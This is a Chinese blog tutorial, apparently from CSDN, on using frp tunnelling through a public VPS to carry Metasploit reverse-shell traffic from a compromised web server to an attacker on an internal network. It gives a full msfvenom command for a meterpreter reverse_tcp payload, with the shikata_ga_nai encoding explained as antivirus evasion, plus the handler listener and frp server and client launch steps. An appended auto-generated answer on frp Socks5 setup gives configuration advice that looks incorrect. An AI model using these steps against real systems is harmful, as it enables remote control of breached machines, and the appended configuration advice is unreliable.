frp隧道(流量代理)

代理

代理使用场景

  1. 拿下远程web服务器
  2. webshell连接不稳定,需要使用稳定的木马程序
  3. 远程服务器无法直接连接攻击者电脑(内网IP)
  4. 需要借助公网vps转发来自失陷服务器的木马流量
  5. 借助frp服务器(vps)和客户端(内网攻击者)建立隧道
  6. 当vps某一个端口收到流量的时候,frps会根据提前和frpc约定好的规则,使用建立好的隧道转发流量

前提条件

攻击者:

  • 拿下了一台webshell权限
  • 需要上传完整功能的木马
  • 生成一个木马,不管谁执行了这个木马,都会连接vps的4444端口发送流量

代理过程

image-20231013203408275

隧道

失陷主机或服务器:

  • 在执行攻击者上传的木马时主动与vps进行连接
  • 请求与vps的4444端口进行通信,发送流量

公网vps:

  • 攻击者可控
  • 攻击者和受害服务器都可以访问
  • vps使用7000端口(frp软件)进行监听,攻击者向vps发出请求建立隧道(只能由攻击者向vps发出请求,因为公网IP不能访问私网IP)
  • 失陷主机运行木马后,失陷主机将信息通过4444端口传送至vps,vps把自己的4444端口的流量通过7000端口转发给攻击者

frp服务

frp存在客户端和服务端,frp服务运行起来后服务端会自行开放7000端口。

  • 内网kali用户上配置frpc客户端

  • vps7.7.7.7上配置frps服务端

  • frps和frpc做好链接后内网IP和vps7.7.7.7就建立了一个隧道

  • frp服务(vps)的4444端口会主动转发(通过7000端口)给客户端设定接收流量的端口

内网IP查看能否与外网通信

image-20231013202952351

image-20231013202942155

MSF木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.75.223 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5

解释:

这是一个使用Metasploit框架中的msfvenom工具生成恶意软件的命令。

  • -p :指定Payload(有效负载:木马的功能点)为Windows Meterpreter反向TCP连接。Meterpreter是Metasploit框架中一个功能强大的远程访问工具。
  • LHOST:设置本地监听IP地址为10.9.75.223。这是恶意软件将连接到的主机IP地址。
  • LPORT:设置本地监听端口号为4444。这是恶意软件将连接到的主机端口号。
  • -e :使用x86/shikata_ga_nai编码来混淆Payload,以避免被基于特征的防病毒软件检测。
  • -f :设置生成的恶意软件文件格式为可执行文件(exe)。
  • -o :指定生成的恶意软件文件名为shell.exe。
  • -i :设置编码迭代次数为5,以增加避免被检测的难度。

木马上传至失陷主机

image-20231013210028793

image-20231013210045558

监听

1、启动msf :msfconsole
2、载入监控模块  :use exploit/multi/handler
3、加载payload:
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
run

image-20231013211002873

image-20231013211044543

image-20231013211350995

kali主机启动监听等待木马连接

失陷主机运行木马后将流量数据包发送给vps的4444端口,但是vps没有开放4444端口

image-20231013211818294

vps开启frp服务:

frp服务端

image-20231013212051157

查看frp服务端的配置文件,当启动frp服务端的时候默认开启7000端口和客户端连接。向客户端发流量数据包。

image-20231013212401559

在frps.exe所在文件打开cmd

frps.exe -c frps.ini	#启动frp服务器

image-20231013212818486

frp客户端:

解压frp客户端压缩包

tar xf frp_0.33.0_linux_amd64.tar.gz

image-20231013213128458

进入frp_0.33.0_linux_amd64目录查看客户端配置信息

cd frp_0.33.0_linux_amd64
ls
sudo vim frpc.ini

image-20231013214823409

启动frp客户端(frpc)

sudo ./frpc -c frpc.ini		#启动客户端

image-20231013215101685

image-20231013215649015

运行木马

失陷主机运行木马

image-20231013220215872

image-20231013220244608

打开生成木马界面获得shell

image-20231013220330963

image-20231013220424012

  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
对于使用 frp 进行 Socks5 代理,你需要进行以下步骤: 1. 首先,确保你已经安装了 frp 工具。你可以在 frp 的官方网站(https://github.com/fatedier/frp)上下载适合你操作系统的版本,并按照说明进行安装。 2. 在 frp 的配置文件中,你需要添加一个反向代理的配置项。打开 frp 的配置文件(通常为 `frps.ini` 或 `frps.conf`),找到 `[reverse_proxy]` 部分,如果没有则需要手动添加该部分。 3. 在 `[reverse_proxy]` 部分中,配置以下参数: - `type = tcp`:指定代理类型为 TCP。 - `remote_port = 1080`:指定远程端口,即 Socks5 代理的端口。 - `local_ip = 127.0.0.1`:指定本地 IP 地址,即 Socks5 代理的监听地址。 - `local_port = 1080`:指定本地端口,即 Socks5 代理的端口。 4. 保存并关闭配置文件。 5. 启动 frp 服务端。使用命令行或终端,进入 frp 的安装目录,并执行以下命令启动服务端: ``` ./frps -c frps.ini ``` 6. 在客户端机器上,安装并配置 Socks5 代理客户端软件。你可以选择使用浏览器插件或独立的 Socks5 客户端软件。在配置客户端时,使用 frp 服务端的公网 IP 地址和配置的远程端口。 7. 连接到 frp 的 Socks5 代理。启动客户端软件,并连接到 frp 提供的 Socks5 代理地址和端口。 通过以上步骤,你就可以使用 frp 搭建一个 Socks5 代理了。请注意,确保 frp 服务端和客户端的配置参数一致,并且防火墙规则允许相应的端口通信

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安咸鱼1517

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值